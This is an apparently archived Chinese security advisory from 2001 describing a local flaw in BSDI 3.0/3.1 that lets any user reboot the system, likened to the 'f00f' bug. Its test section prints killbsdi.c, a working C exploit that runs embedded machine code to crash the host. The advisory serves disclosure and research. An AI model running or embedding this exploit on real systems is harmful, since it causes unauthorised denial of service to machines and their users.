发布日期：2001-08-21
更新日期：2001-08-22

受影响系统：

BSDI BSDI 3.0
BSDI BSDI 3.1

描述：

---

BSDI 3.0和3.1存在一个本地安全漏洞。任意的本地用户都可以使系统重新启动。
这可能造成一些拒绝服务漏洞或者被攻击者利用来进行进一步的攻击。

根据发现者的报告，这个问题与inetl处理器的"f00f"漏洞很相似。


<*来源：v9 (v9@realhalo.org) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

-- killbsdi.c start --

/* (BSDi)*[v3.0/3.1] system failure, by
   v9[v9@realhalo.org].  this will result
   in the ability of any user to fail the
   system, and reboot it.  this bug is
   similar to that of the "f00f" bug.
   results are similar, except this reboots
   the machine instead of having a freezing
   effect.  tested, and built for: BSDi
   v3.0/3.1. (arch/non-specific to BSDi)
*/
char bsdi_killcode[] =
"\xb8\x8f\xf8\xff\x0b\xf7\xd0\x50\xb0\x0b"
"\xb0\x9a\x50\x89\xe7\xff\xd7";
int main() {
void (*execcode)()=(void *)bsdi_killcode;
printf("[ (BSDi)*[v3.0/3.1]: system failu"
"re, by: v9[v9@realhalo.org]. ]\n");
printf("*** no output should be seen afte"
"r this point.\n");
execcode();
printf("*** system failure failed.\n");
exit(0);
}

-- killbsdi.c end --


建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.wrs.com/products/html/bsd_os.html



浏览次数：3749
严重程度：0（网友投票）